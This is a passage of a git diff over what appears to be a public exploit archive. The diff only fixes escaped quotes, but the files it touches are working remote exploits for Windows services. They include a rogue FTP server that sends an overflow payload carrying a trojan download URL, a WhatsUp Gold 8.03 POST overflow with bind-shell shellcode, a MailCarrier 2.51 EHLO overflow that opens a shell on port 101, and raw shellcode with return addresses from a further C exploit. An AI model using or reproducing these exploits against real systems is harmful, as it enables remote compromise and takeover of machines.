+"\xFF\x03\x80\xAB\x71\xFF\xFF\xFF\x03\x80\xAB\x72\xFF\xFF\xFF\x03\x80\xAB\x73\xFF"
+"\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x75\xFF\xFF\xFF\x03\x80\xAB\x76"
+"\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\xAB\x78\xFF\xFF\xFF\x03\x80\xAB"
+"\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x80\xAB\x7B\xFF\xFF\xFF\x03\x80"
+"\xAB\x7C\xFF\xFF\xFF\x03\x80\xAB\x7D\xFF\xFF\xFF\x03\x80\xAB\x7E\xFF\xFF\xFF\x03"
+"\x80\xAB\x7F\xFF\xFF\xFF\x03\x80\x6B\x80\x03\x80\x6B\x81\x03\x80\x6B\x82\x03\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x61\xF9\xFF\xFF";
 
 char *url = argv[2];
 
 if(strlen(url)>80){
-printf(\"ERROR: trojan url is too long!\\n\");
+printf("ERROR: trojan url is too long!\n");
 return;
 }
 
@@ -140,8 +140,8 @@ url[i]+=3;
 exploit[839+i] = url[i];
 }
 
-exploit[839+i] = \'\\x0B\';
-exploit[839+i+1] = \'\\x04\';
+exploit[839+i] = '\x0B';
+exploit[839+i+1] = '\x04';
 
 WSADATA wsaData;
 WSAStartup(MAKEWORD(2,2), &wsaData);
@@ -153,52 +153,52 @@ addr_Sock.sin_family = AF_INET;
 addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY);
 addr_Sock.sin_port = htons(atoi(argv[1]));
 
-printf(\"Awaiting for connections...\\n\");
+printf("Awaiting for connections...\n");
 
 if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) return;
 if(listen(listen_Sock, 1))return;
 SOCKET victim = accept(listen_Sock,NULL,NULL);
-printf(\"Victim connected...\\n\");
+printf("Victim connected...\n");
 
 char buffer[2048];
-sprintf(buffer, \"220 drG4njubas roxx da world...\\r\\n\");
+sprintf(buffer, "220 drG4njubas roxx da world...\r\n");
 send(victim, buffer, strlen(buffer), NULL);
 
 while(true){
 if(recv(victim, buffer, 2048, NULL)==SOCKET_ERROR)return;
-if(strncmp(buffer, \"USER\", 4)==0){
-sprintf(buffer, \"%s\\r\\n\", \"331 Password required for user.\");
+if(strncmp(buffer, "USER", 4)==0){
+sprintf(buffer, "%s\r\n", "331 Password required for user.");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, \"PASS\", 4)==0){
-sprintf(buffer, \"%s\\r\\n\", \"230 User logged in.\");
+else if(strncmp(buffer, "PASS", 4)==0){
+sprintf(buffer, "%s\r\n", "230 User logged in.");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, \"SYST\", 4)==0){
-sprintf(buffer, \"%s\\r\\n\", \"215 Windows_NT version 5.0\");
+else if(strncmp(buffer, "SYST", 4)==0){
+sprintf(buffer, "%s\r\n", "215 Windows_NT version 5.0");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, \"REST\", 4)==0){
-sprintf(buffer, \"%s\\r\\n\", \"350 Restarting at blah.\");
+else if(strncmp(buffer, "REST", 4)==0){
+sprintf(buffer, "%s\r\n", "350 Restarting at blah.");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, \"PWD\", 3)==0){
-sprintf(buffer, \"%s\\r\\n\", \"257 Current directory was changed.\");
+else if(strncmp(buffer, "PWD", 3)==0){
+sprintf(buffer, "%s\r\n", "257 Current directory was changed.");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, \"TYPE\", 4)==0){
-sprintf(buffer, \"%s\\r\\n\", \"200 Type set to blah.\");
+else if(strncmp(buffer, "TYPE", 4)==0){
+sprintf(buffer, "%s\r\n", "200 Type set to blah.");
 send(victim, buffer, strlen(buffer), NULL);
 }
-else if(strncmp(buffer, \"PASV\", 4)==0){
-printf(\"PASV command received, sending exploit...\");
-sprintf(buffer, \"227 (%s,1,1,1,1,1)\\r\\n\", exploit);
+else if(strncmp(buffer, "PASV", 4)==0){
+printf("PASV command received, sending exploit...");
+sprintf(buffer, "227 (%s,1,1,1,1,1)\r\n", exploit);
 send(victim, buffer, strlen(buffer), NULL);
-printf(\"finnished.\\n\");
+printf("finnished.\n");
 break;
 }
 else{
-printf(\"ERROR: Wrong client or pasv mode is not enabled.\\n\");
+printf("ERROR: Wrong client or pasv mode is not enabled.\n");
 break;
 }
 
diff --git a/platforms/windows/remote/566.pl b/platforms/windows/remote/566.pl
index 1a20a384f..fe3ef86e8 100755
--- a/platforms/windows/remote/566.pl
+++ b/platforms/windows/remote/566.pl
@@ -38,80 +38,80 @@ my $port = shift(@ARGV);
 
 # Bind shellcode port 28876 (HDM, metasploit.org)
 my $shellcode =
-\"\\xeb\\x43\\x56\\x57\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\\x52\\x8b\\x52\". 
-\"\\x20\\x01\\xea\\x31\\xc0\\x31\\xc9\\x41\\x8b\\x34\\x8a\\x01\\xee\\x31\\xff\\xc1\". 
-\"\\xcf\\x13\\xac\\x01\\xc7\\x85\\xc0\\x75\\xf6\\x39\\xdf\\x75\\xea\\x5a\\x8b\\x5a\". 
-\"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\". 
-\"\\xe8\\x5f\\x5e\\xff\\xe0\\xfc\\x31\\xc0\\x64\\x8b\\x40\\x30\\x8b\\x40\\x0c\\x8b\". 
-\"\\x70\\x1c\\xad\\x8b\\x68\\x08\\x31\\xc0\\x66\\xb8\\x6c\\x6c\\x50\\x68\\x33\\x32\". 
-\"\\x2e\\x64\\x68\\x77\\x73\\x32\\x5f\\x54\\xbb\\x71\\xa7\\xe8\\xfe\\xe8\\x90\\xff\". 
-\"\\xff\\xff\\x89\\xef\\x89\\xc5\\x81\\xc4\\x70\\xfe\\xff\\xff\\x54\\x31\\xc0\\xfe\". 
-\"\\xc4\\x40\\x50\\xbb\\x22\\x7d\\xab\\x7d\\xe8\\x75\\xff\\xff\\xff\\x31\\xc0\\x50\". 
-\"\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xbb\\xa6\\x55\\x34\\x79\\xe8\\x61\\xff\\xff\". 
-\"\\xff\\x89\\xc6\\x31\\xc0\\x50\\x50\\x35\\x02\\x01\\x70\\xcc\\xfe\\xcc\\x50\\x89\". 
-\"\\xe0\\x50\\x6a\\x10\\x50\\x56\\xbb\\x81\\xb4\\x2c\\xbe\\xe8\\x42\\xff\\xff\\xff\". 
-\"\\x31\\xc0\\x50\\x56\\xbb\\xd3\\xfa\\x58\\x9b\\xe8\\x34\\xff\\xff\\xff\\x58\\x6a\". 
-\"\\x10\\x54\\x50\\x56\\xbb\\x47\\xf3\\x56\\xc6\\xe8\\x24\\xff\\xff\\xff\\x31\\xdb\". 
-\"\\x53\\x68\\x2e\\x63\\x6d\\x64\\x89\\xe1\\x41\\x50\\x50\\x50\\x53\\x53\\x31\\xc0\". 
-\"\\xfe\\xc4\\x40\\x50\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x6a\\x44\". 
-\"\\x89\\xe6\\x50\\x55\\x53\\x53\\x53\\x53\\x54\\x56\\x53\\x53\\x53\\x43\\x53\\x4b\". 
-\"\\x53\\x53\\x51\\x53\\x89\\xfd\\xbb\\x21\\xd0\\x05\\xd0\\xe8\\xe2\\xfe\\xff\\xff\". 
-\"\\x31\\xc0\\x48\\x8b\\x44\\x24\\x04\\xbb\\x43\\xcb\\x8d\\x5f\\xe8\\xd1\\xfe\\xff\". 
-\"\\xff\\x5d\\x5d\\x5d\\xbb\\x12\\x6b\\x6d\\xd0\\xe8\\xc4\\xfe\\xff\\xff\\x31\\xc0\". 
-\"\\x50\\x89\\xfd\\xbb\\x69\\x1d\\x42\\x3a\\xe8\\xb5\\xfe\\xff\\xff\"; 
+"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52". 
+"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1". 
+"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a". 
+"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01". 
+"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b". 
+"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32". 
+"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff". 
+"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe". 
+"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50". 
+"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff". 
+"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89". 
+"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff". 
+"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a". 
+"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb". 
+"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0". 
+"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44". 
+"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b". 
+"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff". 
+"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff". 
+"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0". 
+"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff"; 
 
-my $socket = IO::Socket::INET->new(proto=>\'tcp\', PeerAddr=>$host,
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
 PeerPort=>$port); 
-$socket or die \"Cannot connect to the host.\\n\"; 
+$socket or die "Cannot connect to the host.\n"; 
 
 $socket->autoflush(1); 
 
-print $socket \"POST /_maincfgret.cgi HTTP/1.0\\r\\n\"; 
-print $socket \"Accept: image/gif, image/x-xbitmap, image/jpeg,
+print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n"; 
+print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg,
 image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel,
 application/msword, application/x-shockwave-flash,
-application/vnd.citrix.AdvGWClient-2_2, */*\\r\\n\"; 
-print $socket \"Referer:
-http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\\r\\n\"; 
-print $socket \"Accept-Language: en-us\\r\\nContent-Type:
-application/x-www-form-urlencoded\\r\\nConnection: Keep-Alive\\r\\n\";
-print $socket \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
-5.1; T312461; .NET CLR 1.1.4322)\\r\\n\";
-print $socket \"Host: 127.0.0.1\\r\\nContent-Length: \";
-my $cmd =\"page=notify&origname=&action=return&type=Beeper&instancename=\";
+application/vnd.citrix.AdvGWClient-2_2, */*\r\n"; 
+print $socket "Referer:
+http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n"; 
+print $socket "Accept-Language: en-us\r\nContent-Type:
+application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n";
+print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
+5.1; T312461; .NET CLR 1.1.4322)\r\n";
+print $socket "Host: 127.0.0.1\r\nContent-Length: ";
+my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";
 
 
 #[-------815-------------] [ret] [-------------4080---------]
 #[A.....811...A][jmp] [ret] [nops][shc][E.......E ]
 
-$cmd .= \"A\"x811; #815 -4 
-$cmd .= \"\\xeb\\x06\\x90\\x90\"; #jumper <eb + 06> <garbage> jmp to shellcode
+$cmd .= "A"x811; #815 -4 
+$cmd .= "\xeb\x06\x90\x90"; #jumper <eb + 06> <garbage> jmp to shellcode
 
 
-#$cmd .= \"\\xfe\\x63\\xa1\\x71\"; #winXP SP1 ws2help.dll
-$cmd .= \"\\xc4\\x2a\\x02\\x75\"; #win2k sp0-sp4 ws2help.dll
+#$cmd .= "\xfe\x63\xa1\x71"; #winXP SP1 ws2help.dll
+$cmd .= "\xc4\x2a\x02\x75"; #win2k sp0-sp4 ws2help.dll
 
-#$cmd .= \"LOWNOISE\"; #garbage :D 
-$cmd .= \"\\x90\"x2080;
+#$cmd .= "LOWNOISE"; #garbage :D 
+$cmd .= "\x90"x2080;
 $cmd .= $shellcode;
-$cmd .= \"E\"x(2000-length($shellcode)); #mas basura
+$cmd .= "E"x(2000-length($shellcode)); #mas basura
 
-$cmd .= \"&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end\";
-print $socket length($cmd).\"\\r\\nPragma: no-cache\\r\\nAuthorization: Basic
-YWRtaW46YWRtaW4=\\r\\n\\r\\n\";
-print $socket $cmd.\"\\r\\n\";
+$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
+print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic
+YWRtaW46YWRtaW4=\r\n\r\n";
+print $socket $cmd."\r\n";
 
 close($socket); 
 exit(0); 
 
 sub usage 
 { 
-print \"\\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\\n\";
-print \"===================================================\\n\";
-print \"\\nUsage: NotmuchG.pl [host] [port]\\n\"; 
-print \"[host] Target host\\n[port] WhatsUp webserver port\\n\\n\"; 
-print \"\\n Shell on tcp port 28876.\\n\\n\"; 
-print \"ET LoWNOISE 2004\\n\";
+print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n";
+print "===================================================\n";
+print "\nUsage: NotmuchG.pl [host] [port]\n"; 
+print "[host] Target host\n[port] WhatsUp webserver port\n\n"; 
+print "\n Shell on tcp port 28876.\n\n"; 
+print "ET LoWNOISE 2004\n";
 exit(1); 
 }
 
diff --git a/platforms/windows/remote/598.py b/platforms/windows/remote/598.py
index d52b0be63..bcd8ab32d 100755
--- a/platforms/windows/remote/598.py
+++ b/platforms/windows/remote/598.py
@@ -3,65 +3,65 @@
 # Advanced, secure and easy to use FTP Server. 	    	#
 # 23 Oct 2004 - muts                                	#
 #########################################################
-# D:\\BO>mailcarrier-2.5-EHLO.py                       	#
+# D:\BO>mailcarrier-2.5-EHLO.py                       	#
 #########################################################
-# D:\\data\\tools>nc -v 192.168.1.32 101			#
+# D:\data\tools>nc -v 192.168.1.32 101			#
 # localhost [127.0.0.1] 101 (hostname) open		#
 # Microsoft Windows 2000 [Version 5.00.2195]		#
 # (C) Copyright 1985-2000 Microsoft Corp.		#
-# C:\\WINNT\\system32>					#
+# C:\WINNT\system32>					#
 #########################################################
 
 import struct
 import socket
 
-print \"\\n\\n###############################################\"
-print \"\\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow\"
-print \"\\nFound & coded by muts [at] whitehat.co.il\"
-print \"\\nFor Educational Purposes Only!\\n\" 
-print \"\\n\\n###############################################\"
+print "\n\n###############################################"
+print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
+print "\nFound & coded by muts [at] whitehat.co.il"
+print "\nFor Educational Purposes Only!\n" 
+print "\n\n###############################################"
 
 def make_overflow_dummy(overflow_len, retaddr):
-    return \'A\' * overflow_len + struct.pack(\'<L\', retaddr)
+    return 'A' * overflow_len + struct.pack('<L', retaddr)
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
-sc2 = \"\\xEB\"
-sc2 += \"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"
-sc2 += \"\\xFF\\x60\\xDE\\x88\\x88\\x88\\xDB\\xDD\\xDE\\xDF\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\"
-sc2 += \"\\xF0\\x89\\x62\\x03\\xC2\\x90\\x03\\xD2\\xA8\\x89\\x63\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x89\\x66\\xB9\"
-sc2 += \"\\x77\\x74\\xB9\\x48\\x24\\xB0\\x68\\xFC\\x8F\\x49\\x47\\x85\\x89\\x4F\\x63\\x7A\\xB3\\xF4\\xAC\\x9C\"
-sc2 += \"\\xFD\\x69\\x03\\xD2\\xAC\\x89\\x63\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\\x89\\x63\\x03\\x8C\\x03\\x89\"
-sc2 += \"\\x60\\x63\\x8A\\xB9\\x48\\xD7\\xD6\\xD5\\xD3\\x4A\\x80\\x88\\xD6\\xE2\\xB8\\xD1\\xEC\\x03\\x91\\x03\"
-sc2 += \"\\xD3\\x84\\x03\\xD3\\x94\\x03\\x93\\x03\\xD3\\x80\\xDB\\xE0\\x06\\xC6\\x86\\x64\\x77\\x5E\\x01\\x4F\"
-sc2 += \"\\x09\\x64\\x88\\x89\\x88\\x88\\xDF\\xDE\\xDB\\x01\\x6D\\x60\\xAF\\x88\\x88\\x88\\x18\\x89\\x88\\x88\"
-sc2 += \"\\x3E\\x91\\x90\\x6F\\x2C\\x91\\xF8\\x61\\x6D\\xC1\\x0E\\xC1\\x2C\\x92\\xF8\\x4F\\x2C\\x25\\xA6\\x61\"
-sc2 += \"\\x51\\x81\\x7D\\x25\\x43\\x65\\x74\\xB3\\xDF\\xDB\\xBA\\xD7\\xBB\\xBA\\x88\\xD3\\x05\\xC3\\xA8\\xD9\"
-sc2 += \"\\x77\\x5F\\x01\\x57\\x01\\x4B\\x05\\xFD\\x9C\\xE2\\x8F\\xD1\\xD9\\xDB\\x77\\xBC\\x07\\x77\\xDD\\x8C\"
-sc2 += \"\\xD1\\x01\\x8C\\x06\\x6A\\x7A\\xA3\\xAF\\xDC\\x77\\xBF\\x77\\xDD\\xB8\\xB9\\x48\\xD8\\xD8\\xD8\\xD8\"
-sc2 += \"\\xC8\\xD8\\xC8\\xD8\\x77\\xDD\\xA4\\x01\\x4F\\xB9\\x53\\xDB\\xDB\\xE0\\x8A\\x88\\x88\\xED\\x01\\x68\"
-sc2 += \"\\xE2\\x98\\xD8\\xDF\\x77\\xDD\\xAC\\xDB\\xDF\\x77\\xDD\\xA0\\xDB\\xDC\\xDF\\x77\\xDD\\xA8\\x01\\x4F\"
-sc2 += \"\\xE0\\xCB\\xC5\\xCC\\x88\\x01\\x6B\\x0F\\x72\\xB9\\x48\\x05\\xF4\\xAC\\x24\\xE2\\x9D\\xD1\\x7B\\x23\"
-sc2 += \"\\x0F\\x72\\x09\\x64\\xDC\\x88\\x88\\x88\\x4E\\xCC\\xAC\\x98\\xCC\\xEE\\x4F\\xCC\\xAC\\xB4\\x89\\x89\"
-sc2 += \"\\x01\\xF4\\xAC\\xC0\\x01\\xF4\\xAC\\xC4\\x01\\xF4\\xAC\\xD8\\x05\\xCC\\xAC\\x98\\xDC\\xD8\\xD9\\xD9\"
-sc2 += \"\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\xDB\\xD9\\x77\\xFD\\x88\\xE0\\xFA\\x76\\x3B\\x9E\\x77\\xDD\\x8C\\x77\"
-sc2 += \"\\x58\\x01\\x6E\\x77\\xFD\\x88\\xE0\\x25\\x51\\x8D\\x46\\x77\\xDD\\x8C\\x01\\x4B\\xE0\\x77\\x77\\x77\"
-sc2 += \"\\x77\\x77\\xBE\\x77\\x5B\\x77\\xFD\\x88\\xE0\\xF6\\x50\\x6A\\xFB\\x77\\xDD\\x8C\\xB9\\x53\\xDB\\x77\"
-sc2 += \"\\x58\\x68\\x61\\x63\\x6B\\x90\"
+sc2 = "\xEB"
+sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
+sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
+sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
+sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
+sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
+sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
+sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
+sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
+sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
+sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
+sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
+sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
+sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
+sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
+sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
+sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
+sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
+sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
+sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
+sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
+sc2 += "\x58\x68\x61\x63\x6B\x90"
 
 # Change RET address as need be.
 
-#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + \'\\x90\' * 32 + sc2  # RET Win2000 SP4 ENG
-buffer = make_overflow_dummy(5097, 0x7d17dd13) + \'\\x90\' * 32 + sc2  #RET WinXP SP2 ENG
+#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2  # RET Win2000 SP4 ENG
+buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x90' * 32 + sc2  #RET WinXP SP2 ENG
 
 try:
-	print \"\\nSending evil buffer...\"
-	s.connect((\'127.0.0.1\',25))
-	s.send(\'EHLO \' + buffer + \'\\r\\n\')
+	print "\nSending evil buffer..."
+	s.connect(('127.0.0.1',25))
+	s.send('EHLO ' + buffer + '\r\n')
 	data = s.recv(1024)
 	s.close()
-	print \"\\nDone! Try connecting to port 101 on victim machine.\"
+	print "\nDone! Try connecting to port 101 on victim machine."
 except:
-	print \"Could not connect to SMTP!\"
+	print "Could not connect to SMTP!"
 
 # milw0rm.com [2004-10-26]
diff --git a/platforms/windows/remote/637.c b/platforms/windows/remote/637.c
index 557b6b5d4..71dc9dd0b 100755
--- a/platforms/windows/remote/637.c
+++ b/platforms/windows/remote/637.c
@@ -11,7 +11,7 @@ no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
 Microsoft Windows 2000 [Version 5.00.2195]
 (C) Copyright 1985-2000 Microsoft Corp.
 
-C:\\WINNT\\system32>
+C:\WINNT\system32>
 
 Greets to NtWaK0,schap,kane,kamalo,foufs :P
 */
@@ -28,34 +28,34 @@ Greets to NtWaK0,schap,kane,kamalo,foufs :P
 
 #define PORT 25
 #define RPORT 31337
-#define RET \"\\xD3\\x39\\xD3\\x77\" /*win2k adv server sp4*/
+#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
 
 char shellcode[] =
-\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x4d\\x81\"
-\"\\x59\\x47\\x83\\xeb\\xfc\\xe2\\xf4\\xb1\\x69\\x0f\\x47\\x4d\\x81\\x0a\\x12\\x1b\"
-\"\\xd6\\xd2\\x2b\\x69\\x99\\xd2\\x02\\x71\\x0a\\x0d\\x42\\x35\\x80\\xb3\\xcc\\x07\"
-\"\\x99\\xd2\\x1d\\x6d\\x80\\xb2\\xa4\\x7f\\xc8\\xd2\\x73\\xc6\\x80\\xb7\\x76\\xb2\"
-\"\\x7d\\x68\\x87\\xe1\\xb9\\xb9\\x33\\x4a\\x40\\x96\\x4a\\x4c\\x46\\xb2\\xb5\\x76\"
-\"\\xfd\\x7d\\x53\\x38\\x60\\xd2\\x1d\\x69\\x80\\xb2\\x21\\xc6\\x8d\\x12\\xcc\\x17\"
-\"\\x9d\\x58\\xac\\xc6\\x85\\xd2\\x46\\xa5\\x6a\\x5b\\x76\\x8d\\xde\\x07\\x1a\\x16\"
-\"\\x43\\x51\\x47\\x13\\xeb\\x69\\x1e\\x29\\x0a\\x40\\xcc\\x16\\x8d\\xd2\\x1c\\x51\"
-\"\\x0a\\x42\\xcc\\x16\\x89\\x0a\\x2f\\xc3\\xcf\\x57\\xab\\xb2\\x57\\xd0\\x80\\xcc\"
-\"\\x6d\\x59\\x46\\x4d\\x81\\x0e\\x11\\x1e\\x08\\xbc\\xaf\\x6a\\x81\\x59\\x47\\xdd\"
-\"\\x80\\x59\\x47\\xfb\\x98\\x41\\xa0\\xe9\\x98\\x29\\xae\\xa8\\xc8\\xdf\\x0e\\xe9\"
-\"\\x9b\\x29\\x80\\xe9\\x2c\\x77\\xae\\x94\\x88\\xac\\xea\\x86\\x6c\\xa5\\x7c\\x1a\"
-\"\\xd2\\x6b\\x18\\x7e\\xb3\\x59\\x1c\\xc0\\xca\\x79\\x16\\xb2\\x56\\xd0\\x98\\xc4\"
-\"\\x42\\xd4\\x32\\x59\\xeb\\x5e\\x1e\\x1c\\xd2\\xa6\\x73\\xc2\\x7e\\x0c\\x43\\x14\"
-\"\\x08\\x5d\\xc9\\xaf\\x73\\x72\\x60\\x19\\x7e\\x6e\\xb8\\x18\\xb1\\x68\\x87\\x1d\"
-\"\\xd1\\x09\\x17\\x0d\\xd1\\x19\\x17\\xb2\\xd4\\x75\\xce\\x8a\\xb0\\x82\\x14\\x1e\"
-\"\\xe9\\x5b\\x47\\x37\\xe8\\xd0\\xa7\\x27\\x91\\x09\\x10\\xb2\\xd4\\x7d\\x14\\x1a\"
-\"\\x7e\\x0c\\x6f\\x1e\\xd5\\x0e\\xb8\\x18\\xa1\\xd0\\x80\\x25\\xc2\\x14\\x03\\x4d\"
-\"\\x08\\xba\\xc0\\xb7\\xb0\\x99\\xca\\x31\\xa5\\xf5\\x2d\\x58\\xd8\\xaa\\xec\\xca\"
-\"\\x7b\\xda\\xab\\x19\\x47\\x1d\\x63\\x5d\\xc5\\x3f\\x80\\x09\\xa5\\x65\\x46\\x4c\"
-\"\\x08\\x25\\x63\\x05\\x08\\x25\\x63\\x01\\x08\\x25\\x63\\x1d\\x0c\\x1d\\x63\\x5d\"
-\"\\xd5\\x09\\x16\\x1c\\xd0\\x18\\x16\\x04\\xd0\\x08\\x14\\x1c\\x7e\\x2c\\x47\\x25\"
-\"\\xf3\\xa7\\xf4\\x5b\\x7e\\x0c\\x43\\xb2\\x51\\xd0\\xa1\\xb2\\xf4\\x59\\x2f\\xe0\"
-\"\\x58\\x5c\\x89\\xb2\\xd4\\x5d\\xce\\x8e\\xeb\\xa6\\xb8\\x7b\\x7e\\x8a\\xb8\\x38\"
-\"\\x81\\x31\\xb7\\xc7\\x85\\x06\\xb8\\x18\\x85\\x68\\x9c\\x1e\\x7e\\x89\\x47\";
